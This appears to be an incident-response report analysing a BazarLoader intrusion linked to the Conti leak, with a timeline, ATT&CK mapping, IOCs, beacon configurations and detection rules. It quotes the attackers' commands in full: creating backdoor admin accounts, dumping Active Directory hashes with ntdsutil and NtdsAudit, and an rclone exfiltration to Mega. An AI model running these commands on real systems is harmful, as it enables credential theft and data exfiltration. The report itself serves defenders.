BazarLoader and the Conti Leaks

Intro

In July, we observed an intrusion that started from a BazarLoader infection and lasted approximately three days. The threat actor’s main priority was to map the domain network, while looking for interesting data to exfiltrate. Their preferred method of operation was through GUI applications such as RDP and AnyDesk.

Historically, BazarLoader was used to deploy Ryuk, as we reported on many occasions. In one of our latest reports, we saw BazarLoader result in the deployment of Conti ransomware.

Case Summary

In this case, we did not see the exact initial access vector but based on other reports at the time we assess with medium to high confidence a malicious email campaign delivering macro enabled Word documents was the delivery vector. Shortly after the initial BazarLoader execution, we observed the first discovery commands using the standard built in Microsoft utilities (net view, net group, nltest). We saw the BazarLoader process download and execute the first Cobalt Strike beacon twenty minutes later using rundll32.

As the operators tried to enumerate the network, they miss-typed a lot of their commands. During interactive discovery tasks via the Cobalt Strike beacon, the threat actors attempted an unusual command that had us scratching our heads for awhile, “av_query”. This left us confused, we were not aware of the reason and/or the purpose of this command.

On August 5th, a threat actor that goes with the name “m1Geelka”, leaked multiple documents that contained instructions, tools and, “training” materials to be used by affiliates of Conti ransomware. We demonstrated some of the documents on one of our recent tweet threads, more info about the Conti leak here. In these materials, we found a file called “AVquery.cna” that refers to a Cobalt Strike aggressor script for identifying AV on the target systems. It is likely that the threat actors in this intrusion meant to use this aggressor script via their Cobalt Strike console, but instead typed or pasted “av_query” into their windows command prompt session. Additionally, threat actors were seen following the instructions of the leaked documents step by step. More specifically, we observed the threat actors copy/pasting the exact commands such as creating local admin users that contained the same passwords we saw in the leaked instructions.

Continuing with the discovery phase, the threat actors executed AdFind via a batch script before further enumerating using native Windows tools and port scanning via the Cobalt Strike beacon. They then successfully escalated privileges by dumping credentials from the LSASS process. After having enough situational awareness over the domain and an administrator’s account in their possession, operators used a reverse proxy and established a RDP connection on the beachhead host. Moments later, we observed them move laterally for the first time to the Domain Controller using RDP. Once on the Domain Controller, they again downloaded and executed AdFind through the same batch script. They also ran two separate Cobalt Strike beacons. As if their presence was not enough with Cobalt Strike and administrator credentials, they proceeded with creating two local administrator accounts.

Next, they installed AnyDesk, a remote access application for RDP connectivity and remote system control. After having four different types of persistence, they felt it was enough and continued enumerating the network, only this time, they searched for valuable documents across all domain-joined hosts. To accomplish that, they used PowerSploit and, more specifically, the “Invoke-ShareFinder” module. While waiting for their script to finish, the threat actors created a full backup of active directory in “IFM” media mode and dumped the password hashes along with the corresponding users. This method is both stealthier and safer for extracting the hashes from active directory, as explained by Black Hills Information Security.

The next step for the threat actors was to download and run “Advanced IP Scanner” and scanned for ranges looking for other active subnets on the LAN. After four hours of downtime, the operators returned to the network and did something unexpected; they used seatbelt to enumerate the domain controller further. They then pivoted over to another domain controller, repeated all the above discovery steps, and ran the same tools as on the first domain controller.

Eventually, this intrusion ended on the third day from the initial BazarLoader execution. After almost a day of inactivity, the operators logged into the network and used RDP to remote into file servers that contained valuable data. They then created a directory called Shares$ and used Rclone to exfiltrate the data to the Mega Fileshare service. Typically, these types of cases end up with Conti ransomware, however, the threat actors were evicted from the network before a final suspected ransomware deployment commenced.

Services

We offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, Metasploit, Empire, PoshC2, BazarLoader, etc. More information on this service and others can be found here.

Three of the Cobalt Strike servers from this case were added to the Threat Feed on 7/19 and the other two were added on 7/29.

We also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs including Sysmon, Kape packages, and more, under our Security Researcher and Organization services.

Timeline

Analysis and reporting completed by @kostastsale

Reviewed by @iiamaleks and @pigerlin

MITRE ATT&CK

Initial Access

We assess with medium to high confidence that the initial access was a result of malicious, macro-enabled, Word document that was sent as an attachment to the targets of a phishing campaign.

Brad reported on similar BazarLoader activity initiated from malicious TA551 Word Doc email campaign that resulted in Cobalt Strike beacons.

enter image description here

Execution

The initial execution for this intrusion took place with the use of BazarLoader malware via rundll32.

enter image description here

Immediately after the execution, the malware contacted two of its C2 IPs:

35.165.197.209|443 
3.101.57.185|443

enter image description here

We then observed the threat actor using the BazarLoader injected process, svchost.exe, to download Cobalt Strike and save it under:

C:\Users\<user>\Appdata\Local\Temp

before executing it using rundll32.exe.

enter image description here

Throughout the intrusion, the threat actors utilized Cobalt Strike beacons and PowerShell to execute their payloads prior to interactively remoting into hosts using RDP and AnyDesk.

Persistence

The threat actors created two local user accounts on the first Domain Controller. They also added one of the two to the local administrators group. The passwords that they used were the same as the passwords of the recent Conti leaked documents.

Screenshot from leaked Conti data (“Закреп\ AnyDesk.txt”) (our tweet thread on Conti leak manuals):

enter image description here

Commands from the intrusion:

net user sqlbackup qc69t4b#z0ke3 /add 
net user localadmin qc69t4b#z0ke3 /add 
net localgroup administrators localadmin /add 

AnyDesk was also installed on the main domain controller.

enter image description here

The threat actors maintained an open communication channel through AnyDesk for a period of 11 hours.

The threat actor was seen logging in from 185.220.100.242 (Tor Exit Node) using AnyDesk. Client ID 776934005. (ad_svc.trace)

Privilege Escalation

The threat actors accessed credentials for an administrator account from the LSASS process using the Cobalt Strike beacon. On the image below, we can see that the CS beacon process is injected into LSASS.

enter image description here

Defense Evasion

Throughout the intrusion, we observed multiple instances of process injection  from both the initial BazarLoader malware and Cobalt Strike beacons.

After BazarLoader was loaded in memory, almost immediately it injected into svchost.exe process. Additionally, the Cobalt Strike beacon was injected into mstsc.exe, searchindexer.exe and rundll32.exe and run various tasks from these processes.

enter image description here

Credential Access

The LSASS process was accessed by an unusual process “searchindexer.exe” on beachhead right before the lateral movement was observed. Searchindexer.exe is a legitimate Windows process responsible for the indexing of files or Windows searches.

This technique is known to be used by Cobaltstrike which inject malicious code into a newly spawned searchindexer process to evade detection. This is associated with MITRE ATT&CK (r) Tactic(s): Defense Evasion and Technique(s): T1036.004.

The Sysmon logs captured in our case below can be used to detect this type of activity.

Sysmon Event ID: 10 
Description: Process Access  
SourceImage: C:\Winows\System32\SearchIndexer.exe 
TargetImage: C:\Windows\system32\lsass.exe 
SourceImage: C:\Winows\System32\SearchIndexer.exe 
TargetImage: C:\Windows\system32\lsass.exe 

GrantedAccess: 0x21410 

CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d2e4|C:\Windows\System32\KERNELBASE.dll+2bcee|C:\Program Files\Common Files\Microsoft Shared\Ink\IpsPlugin.dll+10369|C:\Program Files\Common Files\Microsoft Shared\Ink\IpsPlugin.dll+10b65|C:\Program Files\Common Files\Microsoft Shared\Ink\IpsPlugin.dll+8cb2 

The threat actors created a full backup of the active directory in “IFM” media mode and dumped the password hashes along with the corresponding users.

ntdsutil "ac in ntds" "ifm" "create full c:\windows\temp\crashpad\x" q q 

They also employed the NtdsAudit tool immediately after using NTDSutil to dump the password hashes of all domain users. NtdsAudit requires the “ntds.dit” database file and SYSTEM registry file for extracting the password hashes and usernames. After providing these as arguments, they exported the password hashes in a file that they named “pwdump.txt” and the user details in a csv file called “users.csv”. After obtaining the password hashes, the threat actors can crack the passwords hashes using a program such as hashcat.

ntdsAudit.exe ntds.dit -s SYSTEM -p pwddump.txt -u users.csv

Discovery

A few minutes after the initial execution, BazarLoader ran some discovery tasks using the built in Microsoft net and nltest utilities and transferred the results over the C2 channel.

net view /all  
net view /all /domain  
nltest /domain_trusts /all_trusts  
net localgroup "administrator" (comment: command mistyped)  
net group "domain admins" /dom 

Later on, hands-on operators carried out some additional network and domain reconnaissance from the Cobalt Strike beacon. Again, built in utilities were favored, with the exception of what we assess was a fat finger or miss-paste by the threat actor entering a command they meant to execute in their Cobalt Strike console into the windows command terminal.

ipconfig /all  
nltest /dclist  
net group "Domain Admins" /dom  
tasklist  
av_query  (comment: Not a valid command) 
net  localgroup Administrateurs (comment: French translation of the named group administrators) 
net localgroup Administrators 
SYSTEMINFO 

enter image description here

The threat actors executed AdFind multiple times on both the beachhead and the domain controllers through a well-known script called adf.bat.

adfind.exe -f "(objectcategory=person)"  
adfind.exe -f "objectcategory=computer"  
adfind.exe -f "(objectcategory=organizationalunit)"  
adfind.exe -sc trustdmp  
adfind.exe -subnets -f (objectcategory=subnet)  
adfind.exe -f "(objectcategory=group)"  
adfind.exe -gcb -sc trustdmp 

Later on, during the first day of the intrusion, and before we saw the threat actors pivot laterally to the domain controller, they ensured the information that they had collected was accurate by running the below enumeration commands:

net use  
ipconfig /all  
netstat -ano  
net group "domain admins" /domain  
net view "Domain Controller name"  
net view "Second Domain Controller name"
ping "Domain Controller IP"
ping "Domain Controller name"
ping "Second Domain Controller name"
ping "Domain Controller IPv6"
echo %%username%%  
arp -a  
time  
date

Threat actor dropped and ran a script named ping.bat. Here’s an example:

ping -n 1 hostname >> C:\programdata\log.txt
ping -n 1 hostname2 >> C:\programdata\log.txt
ping -n 1 hostname3 >> C:\programdata\log.txt

The threat actors utilized Advanced IP Scanner to the scan for open ports.

enter image description here

enter image description here

One of the first things that the attackers did once on the first domain controller, was to execute Invoke-ShareFinder from PowerSploit via PowerShell ISE. They did the same thing later, on the second domain controller.

"Command": "Get-NetCurrentUser" 
"Command": "Get-NetDomain" 
"Command": "Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shares.txt"

Other Microsoft AD management PowerShell administration modules were also invoked by the threat actors for discovery tasks.

Get-ADDomainController
Get-ADDomainController -Filter * | ft
Get-ADComputer -Filter * -Properties * | Get-Member
Get-ADDomain

From the Domain Controller the threat actor also ran a Seatbelt binary, which was also seen in the Conti leak documents. This utility contains a number of “safety checks” on a host, telling the user about things like installed AV, network drives, local users, and much more.

We also noticed the threat actors searching for any existing antivirus software on the domain controller. They ran “dir” on the “c:\Program Files\” folder and saved the findings in the AV.txt file using a script named av.bat The script looked similar to the below:

dir "\\hostname\c$\Program Files\* >> C:\programdata\AV.txt
dir "\\hostname2\c$\Program Files\* >> C:\programdata\AV.txt
dir "\\hostname3\c$\Program Files\* >> C:\programdata\AV.txt

Lateral Movement

Many hours after the initial compromise, we observed the threat actors using RDP to connect to the first domain controller. They used reverse proxy via the Cobalt Strike C2 to initiate the RDP connection and for that reason, the operator’s real hostname was captured in event ID 4624:

enter image description here

Collection

Prior to exfiltrating the data, operators staged them under a directory called “Shares” on each file server. They then inspected the documents they collected prior to exfiltrating them over to Mega storage servers using the Rclone application.

Command and Control

BazarLoader initial communication with the C2 is over HTTPS. Data is sent to the C2 via the cookie parameter(screenshot taken from https://tria.ge/210716-v4jh8hf6ea/behavioral2).

enter image description here

Twenty minutes after the initial execution, BazarLoader downloaded and executed Cobalt Strike beacon with the help of rundll32.exe.

The AnyDesk software installed by the threat actors maintained a constant connection to the Anydesk infrastructure for the duration of the intrusion.

AnyDesk:

143.244.61.217:443
JA3: c91bde19008eefabce276152ccd51457
JA3s: 107030a763c7224285717ff1569a17f3
Certificate: [18:42:fd:a1:39:29:33:47:44:65:bc:a2:d6:73:a8:c5:c9:35:9a:f3 ]
Not Before: 2014/04/11 02:37:55 UTC 
Not After: 2024/04/08 02:37:55 UTC 
Issuer Org: philandro Software GmbH 
Subject Common: anynet root ca 
Subject Org: philandro Software GmbH 
Public Algorithm: rsaEncryption 

Certificate: [9e:08:d2:58:a9:02:cd:4f:e2:4a:26:b8:48:5c:43:0b:81:29:99:e3 ]
Not Before: 2018/11/18 02:14:23 UTC 
Not After: 2028/11/15 02:14:23 UTC 
Issuer Org: philandro Software GmbH 
Subject Common: anynet relay 
Subject Org: philandro Software GmbH 
Public Algorithm: id-ecPublicKey Curveprime256v1

Some network oddities appeared several times during the course of the intrusion. One of those oddities was several connections across the intrusion to an XMPP chat server at chatterboxtown.us at 70.35.205.161. These connections originated from one of the Cobalt Strike processes over port 5222. The goal of this traffic was not discovered in the course of the investigation.

Another, was a brief SSH connection to a server on the internet using Putty.

enter image description here

The connection took place for a period of twenty minutes. The reason for this connection is unknown. According to public records, the IP is associated with an old Cobalt Strike C2 server.

BazarLoader:

35.165.197.209:443
JA3: 72a589da586844d7f0818ce684948eea
JA3s: e35df3e00ca4ef31d42b34bebaa2f86e
Certificate: [df:f6:ef:75:f8:f5:c8:8c:1a:4b:49:fd:29:99:d8:58:d0:9c:17:b0 ]
Not Before: 2021/07/13 11:58:09 UTC 
Not After: 2022/07/13 11:58:09 UTC 
Issuer Org: NN Fern 
Subject Common: forenzik.kz 
Subject Org: NN Fern 
Public Algorithm: rsaEncryption

3.101.57.185:443
JA3: 72a589da586844d7f0818ce684948eea
JA3s: e35df3e00ca4ef31d42b34bebaa2f86e
Certificate: [71:9c:ce:11:b3:f0:ea:6f:1e:0f:ff:0f:b4:34:ec:bb:6c:aa:35:40 ]
Not Before: 2021/07/13 11:58:21 UTC 
Not After: 2022/07/13 11:58:21 UTC 
Issuer Org: NN Fern Subject 
Common: forenzik.kz 
Subject Org: NN Fern 
Public Algorithm: rsaEncryption

54.177.153.230:443
JA3: 72a589da586844d7f0818ce684948eea
JA3s: e35df3e00ca4ef31d42b34bebaa2f86e
Certificate: [a1:ab:fe:d6:e4:5a:23:14:dd:8b:67:54:1d:8e:85:b1:c6:10:4a:3f ]
Not Before: 2021/07/13 11:58:22 UTC 
Not After: 2022/07/13 11:58:22 UTC 
Issuer Org: NN Fern 
Subject Common: forenzik.kz 
Subject Org: NN Fern 
Public Algorithm: rsaEncryption

Cobalt Strike:

yawero.com (45.153.240.234:443) This Cobalt Strike server was added to our Threat Feed on 07/19/2021.

JA3: a0e9f5d64349fb13191bc781f81f42e1
JA3s: ae4edc6faf64d08308082ad26be60767
Certificate: [f7:1b:37:3f:2c:0e:c4:3f:dd:3a:f5:dd:ad:39:54:b2:db:b4:c7:f3 ]
Not Before: 2021/06/02 00:00:00 UTC 
Not After: 2022/06/02 23:59:59 UTC 
Issuer Org: Sectigo Limited 
Subject Common: sazoya.com [sazoya.com ,www.sazoya.com ]
Public Algorithm: rsaEncryption

sazoya.com (23.106.160.77:443) This Cobalt Strike server was added to our Threat Feed on 07/29/2021.

JA3: a0e9f5d64349fb13191bc781f81f42e1
JA3s: ae4edc6faf64d08308082ad26be60767
Certificate: [f7:1b:37:3f:2c:0e:c4:3f:dd:3a:f5:dd:ad:39:54:b2:db:b4:c7:f3 ]
Not Before: 2021/06/02 00:00:00 UTC 
Not After: 2022/06/02 23:59:59 UTC 
Issuer Org: Sectigo Limited 
Subject Common: sazoya.com [sazoya.com ,www.sazoya.com ]
Public Algorithm: rsaEncryption

sazoya.com (192.198.86.130:443) This Cobalt Strike server was added to our Threat Feed on 07/29/2021. The IP appeared previously tied to a different domain on 05/11/2021.

JA3: 72a589da586844d7f0818ce684948eea
JA3s: ae4edc6faf64d08308082ad26be60767
Certificate: [f7:1b:37:3f:2c:0e:c4:3f:dd:3a:f5:dd:ad:39:54:b2:db:b4:c7:f3 ]
Not Before: 2021/06/02 00:00:00 UTC 
Not After: 2022/06/02 23:59:59 UTC 
Issuer Org: Sectigo Limited 
Subject Common: sazoya.com [sazoya.com ,www.sazoya.com ]
Public Algorithm: rsaEncryption
{ 
    "x64": { 
        "md5": "9ea3a4b4bf64aeaefb60ada634f7fb43", 
        "sha1": "3e12312e43f4b84129023057862ee3934ca24c6d", 
        "time": 1627455897000.6, 
        "sha256": "43ecc44566a599a1f5d5b5063f27fd18b34e0dc67e053570e9ad944ad3f16024", 
        "config": { 
            "Spawn To x86": "%windir%\\syswow64\\rundll32.exe", 
            "HTTP Method Path 2": "/ro", 
            "Jitter": 14, 
            "C2 Server": "yawero.com,/skin.js,sazoya.com,/skin.js,192.198.86.130,/skin.js", 
            "Method 1": "GET", 
            "Port": 443, 
            "Method 2": "POST", 
            "Polling": 5000, 
            "Spawn To x64": "%windir%\\sysnative\\rundll32.exe", 
            "Watermark": 1580103814, 
            "Beacon Type": "8 (HTTPS)", 
            "C2 Host Header": "" 
        }, 
        "uri_queried": "/IMXo" 
    }, 
    "x86": { 
        "md5": "d2bb4366b7018e0ed3e7f752fc312371", 
        "sha1": "0dfc5ef1947a29227d994a44f33c1b0fe12598ea", 
        "time": 1627455891592.5, 
        "sha256": "01b164f74bde4eb7c7da8c6cd707f23ce1923da49a3deb36aea5cd6e3030c0d6", 
        "config": { 
            "Spawn To x86": "%windir%\\syswow64\\rundll32.exe", 
            "HTTP Method Path 2": "/groupcp", 
            "Jitter": 14, 
            "C2 Server": "yawero.com,/skin.js,sazoya.com,/skin.js,192.198.86.130,/skin.js”,v 
            "Method 1": "GET", 
            "Port": 443, 
            "Method 2": "POST", 
            "Polling": 5000, 
            "Spawn To x64": "%windir%\\sysnative\\rundll32.exe", 
            "Watermark": 1580103814, 
            "Beacon Type": "8 (HTTPS)", 
            "C2 Host Header": "" 
        }, 
        "uri_queried": "/PJkW" 
    } 
} 

Cobalt Strike:

gojihu.com (23.106.215.61:443) This Cobalt Strike server was added to our Threat Feed on 07/19/2021.

JA3: a0e9f5d64349fb13191bc781f81f42e1
JA3s: ae4edc6faf64d08308082ad26be60767
Certificate: [1f:1c:7a:7d:0c:9d:cd:dd:47:2f:a9:e5:ac:c8:ae:da:70:29:02:81 ]
Not Before: 2021/07/04 00:00:00 UTC 
Not After: 2022/07/04 23:59:59 UTC 
Issuer Org: Sectigo Limited 
Subject Common: yuxicu.com [yuxicu.com ,www.yuxicu.com ]
Public Algorithm: rsaEncryption 

yuxicu.com (23.82.19.173:443) This Cobalt Strike server was added to our Threat Feed on 07/19/2021.

JA3: a0e9f5d64349fb13191bc781f81f42e1
JA3s: ae4edc6faf64d08308082ad26be60767
Certificate: [1f:1c:7a:7d:0c:9d:cd:dd:47:2f:a9:e5:ac:c8:ae:da:70:29:02:81 ]
Not Before: 2021/07/04 00:00:00 UTC 
Not After: 2022/07/04 23:59:59 UTC 
Issuer Org: Sectigo Limited 
Subject Common: yuxicu.com [yuxicu.com ,www.yuxicu.com ]
Public Algorithm: rsaEncryption 
{ 
    "x86": { 
        "uri_queried": "/HjIa", 
        "md5": "742844254840eff409535494ae3ec338", 
        "config": { 
            "Beacon Type": "8 (HTTPS)", 
            "C2 Host Header": "", 
            "C2 Server": "gojihu.com,/fam_cart.js,yuxicu.com,/fam_cart.js", 
            "HTTP Method Path 2": "/case", 
            "Port": 443, 
            "Method 1": "GET", 
            "Spawn To x64": "%windir%\\sysnative\\mstsc.exe", 
            "Method 2": "POST", 
            "Spawn To x86": "%windir%\\syswow64\\mstsc.exe", 
            "Polling": 5000, 
            "Jitter": 32, 
            "Watermark": 1580103814 
        }, 
        "sha256": "8c7e32178cf437f4fd3d7f706066831fce2cd9bc7e2050a3cefebab05952266d", 
        "time": 1627787111212.2, 
        "sha1": "46f33bb1c629cedb52fc5d7e46525ac5ccb13aaa" 
    }, 
    "x64": { 
        "uri_queried": "/4Ovd", 
        "md5": "1e788b5d1ff62688cfe5d2ef7832712a", 
        "config": { 
            "Beacon Type": "8 (HTTPS)", 
            "C2 Host Header": "", 
            "C2 Server": "gojihu.com,/fam_cart.js,yuxicu.com,/fam_cart.js", 
            "HTTP Method Path 2": "/case", 
            "Port": 443, 
            "Method 1": "GET", 
            "Spawn To x64": "%windir%\\sysnative\\mstsc.exe", 
            "Method 2": "POST", 
            "Spawn To x86": "%windir%\\syswow64\\mstsc.exe", 
            "Polling": 5000, 
            "Jitter": 32, 
            "Watermark": 1580103814 
        }, 
        "sha256": "43ac1418825ccbe33ae34c64fd036f23ef066073e4fefa2a410b53922cfc815f", 
        "time": 1627787113671.1, 
        "sha1": "d4d88b60150088041fec4951335128031441bc5a" 
    } 
} 

Exfiltration

As the threat actors were perusing files, we received a notification that one of our files had been remotely opened from 46.38.235.14.

The threat actors later exfiltrated sensitive documents from domain joined file servers using the Rclone application. The destination of the exfiltrated data was Mega.io.

enter image description here

The above command was copied and pasted by the threat actors to exfiltrate the data. Prior to the correct command, the threat actors accidentally pasted a command from a previous intrusion. That command contained a different victim organization in the arguments showing through out the intrusion continued sloppiness of the threat actor.

rclone.exe copy--max-age 3y "\\<redacted>\C$\Shares" remote: <redacted>\<redacted> --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P 

Breaking down the Rclone command line arguments:

- copy: Copy the source to the destination 
- --max-age: Only transfer files younger than <time> 
- \\<redacted>\C$\Shares": From source 
- remote: <redacted>\<redacted>: To destination folder 
- Bwlimit 2M: Bandwidth limit 
- -q: quiet 
- --ignore-existing: Skip all files that exist on destination 
- --auto-confirm: Do not request console confirmation 
- --multi-thread-streams: Max number of streams to use for multi-thread downloads 
- --transfers: Number of file transfers to run in parallel 
- -P: Show progress 

Reference:

https://rclone.org/flags/ 
https://rclone.org/commands/rclone_copy/

A great reference for detecting Rclone data exfiltration is the article from nccgroup: Detecting Rclone – An Effective Tool for Exfiltration – and from Red Canary – Transferring Leverage in a Ransomware Attack.

Impact

Multiple sensitive files were exfiltrated but before the threat actors could take any further action inside the network, they were evicted from the network. BazarLoader infections currently tend to materialize into Conti ransomware, and many of the TTP’s of the infection mimic the instructions from the leaked Conti manual.

Information posted from @AltShiftPrtScn based on an IR engagement where the threat actors already had domain admin on the network two months prior meeting their final objectives.

enter image description here

enter image description here

IOCs

Network
45.153.240.234|443
yawero.com
23.106.160.77|443
sazoya.com
192.198.86.130|443
23.106.215.61|443
gojihu.com
23.82.19.173:443
yuxicu.com
35.165.197.209|443
3.101.57.185|443
54.177.153.230|443
File
21.dll
d6b773f8b88be82d4de015edbf0cc2fa
7461eb3051102c76004cd58e55560044d3789d5c
96a74d4c951d3de30dbdaadceee0956682a37fcbbc7005d2e3bbd270fbd17c98
21.exe
362812fdbc2dc2c5a2b214f223f12096
2c4c4926b3b931d4628425b309a3357c63634fc9
972e38f7fa4c3c59634155debb6fb32eebda3c0e8e73f4cb264463708d378c39
37B.dll
d6b773f8b88be82d4de015edbf0cc2fa
7461eb3051102c76004cd58e55560044d3789d5c
96a74d4c951d3de30dbdaadceee0956682a37fcbbc7005d2e3bbd270fbd17c98
adf.bat
7645b80c8627b0ba13ebc20491c82792
05c43272a1d244413d0ef8595518b9c7601d3968
218e8dc823e27a3baf3dcf48831562d488c2fa2c205286ea9af8a718b246b4cb
NtdsAudit.exe
1fd930064b81e7c96eedb985ca2a0d97
39f7e3f5435cdfacaa89aa5ef2d4e092bde4494e
fb49dce92f9a028a1da3045f705a574f3c1997fe947e2c69699b17f07e5a552b
ea3612919bf05b66e9a608bee742a422.dll
ea3612919bf05b66e9a608bee742a422
fd001fb71e9faa68c6e53162ed0554fd6f16a0e381aa280cea397b3d74bb62eb

Detections

Network
ET TROJAN Observed Malicious SSL Cert (BazaLoader CnC) 
ET MALWARE Observed Malicious SSL Cert (Bazar Backdoor) 
ET POLICY IP Check Domain (myexternalip .com in TLS SNI) 
ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software) 
ET USER_AGENTS AnyDesk Remote Desktop Software User-Agent 
ET POLICY HTTP POST to MEGA Userstorage 
Sigma

Detects execution of Net.exe, whether suspicious or benign – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_net_execution.yml

Suspicious AdFind Execution – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_adfind.yml

AD Privileged Users or Groups Reconnaissance – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_account_discovery.yml

Dridex Process Pattern – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_malware_dridex.yml

Domain Trust Discovery – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_trust_discovery.yml

Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) – https://github.com/NVISOsecurity/sigma-public/blob/master/rules/windows/process_creation/win_susp_ntdsutil.yml

Advanced IP Scanner – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_advanced_ip_scanner.yml

Local Accounts Discovery – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_local_system_owner_account_discovery.yml

Net.exe User Account Creation – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_net_user_add.yml

Rundll32 Internet Connection – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_rundll32_net_connections.yml

Malicious PowerShell Commandlets – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/powershell/powershell_malicious_commandlets.yml

Suspicious Svchost Process – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_svchost.yml

Rclone Execution via Command Line or PowerShell – https://gist.github.com/beardofbinary/fede0607e830aa1add8deda3d59d9a77#file-rclone_execution-yaml

DNS Query for MEGA.io Upload Domain – https://gist.github.com/beardofbinary/d46c3b4e37ba8b21a79a63fbf69c6411#file-mega_dns_lookup-yaml

Yara
rule informational_AnyDesk_Remote_Software_Utility { 

   meta: 
      description = "files - AnyDesk.exe" 
      author = "TheDFIRReport" 
      date = "2021-07-25" 
      hash1 = "9eab01396985ac8f5e09b74b527279a972471f4b97b94e0a76d7563cf27f4d57" 
   strings: 
      $x1 = "C:\\Buildbot\\ad-windows-32\\build\\release\\app-32\\win_loader\\AnyDesk.pdb" fullword ascii 
      $s2 = "release/win_6.3.x" fullword ascii 
      $s3 = "16eb5134181c482824cd5814c0efd636" fullword ascii 
      $s4 = "b1bfe2231dfa1fa4a46a50b4a6c67df34019e68a" fullword ascii 
      $s5 = "Z72.irZ" fullword ascii 
      $s6 = "ysN.JTf" fullword ascii 
      $s7 = ",;@O:\"" fullword ascii 
      $s8 = "ekX.cFm" fullword ascii 
      $s9 = ":keftP" fullword ascii 
      $s10 = ">FGirc" fullword ascii 
      $s11 = ">-9 -D" fullword ascii 
      $s12 = "% /m_v?" fullword ascii 
      $s13 = "?\\+ X5" fullword ascii 
      $s14 = "Cyurvf7" fullword ascii 
      $s15 = "~%f_%Cfcs" fullword ascii 
      $s16 = "wV^X(P+ " fullword ascii 
      $s17 = "\\Ej0drBTC8E=oF" fullword ascii 
      $s18 = "W00O~AK_=" fullword ascii 
      $s19 = "D( -m}w" fullword ascii 
      $s20 = "avAoInJ1" fullword ascii 
   condition: 
      uint16(0) == 0x5a4d and filesize < 11000KB and 
      1 of ($x*) and 4 of them 
} 

rule cobalt_strike_dll21_5426 { 
   meta: 
      description = "files - 21.dll" 
      author = "TheDFIRReport" 
      date = "2021-07-25" 
      hash1 = "96a74d4c951d3de30dbdaadceee0956682a37fcbbc7005d2e3bbd270fbd17c98" 
   strings: 
      $s1 = "AWAVAUATVWUSH" fullword ascii 
      $s2 = "UAWAVVWSPH" fullword ascii 
      $s3 = "AWAVAUATVWUSPE" fullword ascii 
      $s4 = "UAWAVATVWSH" fullword ascii 
      $s5 = "AWAVVWUSH" fullword ascii 
      $s6 = "UAWAVAUATVWSH" fullword ascii 
      $s7 = "AVVWSH" fullword ascii 
      $s8 = "m1t6h/o*i-j2p2g7i0r.q6j3p,j2l2s7p/s9j-q0f9f,i7r2g1h*i8r5h7g/q9j4h*o7i4r9f7f3g*p/q7o1e5n8m1q4n.e+n0i*r/i*k2q-g0p-n+q7l3s6h-h6j*q/" ascii 
      $s9 = "s-e6m/f-g*j.i8p1g6j*i,o1s9o5f8r-p1l1k4o9n9l-s7q8g+n,f4t0q,f6n9q5s5e6i-f*e6q-r6g8s1o6r0k+h6p9i4f6p4s6l,g0p1j6l4s1l4h2f,s9p8t5t/g6" ascii 
      $s10 = "o1s1s9i2s.f1g5l6g5o2k8h*e9j2o3k0j1f+n,k9h5l*e8p*s2k5r3j-f5o-f,g+e*s-e9h7e.t0e-h3e2t1f8j5k/m9p6n/j3h9e1k3h.t6h2g1p.l*q8o*t9l6p4s." ascii 
      $s11 = "k7s9g7m5k4s5o3h6k.s1p.h9k.s-o8e*f5n9r,l4f-s5k3p2f/n1r.i*f*n-p4s3e7m9p2t/e3m5g1s9e0m1q/j*e*m-r*i+h.p9s2f6h-p5s6e2h8p1s*j.h3p-s.h0" ascii 
      $s12 = "k9g9o0t1s4k*k*h.s-p-k.h-m1k*f4h0j7f6n,i5g-n3h+l3n1j7j0e*n5r6r-i9i/e1q4m6i3e2o8j9h9e0m.r-i9m*t4j/r.o*l8m4i.t5l,g-h0p6f7l+p-l3l,g." ascii 
      $s13 = "s6k9n/j.s4s5g2p6s.k1t/j6s,s-g*p.n6f9m/g.n4n5j2q6n.f1p/g6n,n-j*q.m6e9o/h.m4m5i2r6m.e1p/h6m,m-i*r.p6h9m/e.p4p5l2s6p.h1l/e7p,p-l*s." ascii 
      $s14 = "r4k7g8t-k4o6m,o1s1k.k1s6o,h8k-s4j8q*m+f/i*q/f3m-r5j2n0f0i*q0m/e0j5q7n5f4j7q3n7f1m4g2s,g5s5l9h7s9p1o.t8k5r-j3t.k8h1t6r7m-l5h5t1l*" ascii 
      $s15 = "k8s9n7o9k5s5o9m2k0s1m3m.k,s-n+o-f9n9t+t6f4n5o6t2f0n1s/r1f-n-o.t*e8m9i-s6e4m5t3q5e1m1i5s.e,m-k0s*h8p9q7t9h5p5j8r2h0p1h+r.h,p-q+t-" ascii 
      $s16 = "o9g6g0l0s1e6h4p-g6s9s9p1m1k*s3l-t5s.f8m5r5f6n+i2j8f*h,p5j2r.h0h1q9i6e8r-i*n8m-r5s-l.i8f2i1k.o4n1t9l6l0g,p9j6f,g.l-j*n0o-t-l*p5s-" ascii 
      $s17 = "t8n2i3e0i,l.i7i9e8r1j7o0n3i9j0m3m-l6e6s9r*l6s5h4t6n7o*k.r1f+r4l/q9g7i3o.m+t9q*g/j0h0e1n*m3i,h.e4n3i5n-r9g1h2k6m7j,e,p3p+h2o4f/h4" ascii 
      $s18 = "[_^A^A_]" fullword ascii 
      $s19 = "k9s9f+j*k3s5o-j/k/s1h/p5k-s-o7j7f7n9t/g+f3n5q/r8f1n1t7g3f+n-p.g8e7m9s3q4e5m5o+h0e/m1g-h4e+m-m+q0h9p9f/e,h3p5l6e1h/p1o7t,h-p-k+f5" ascii 
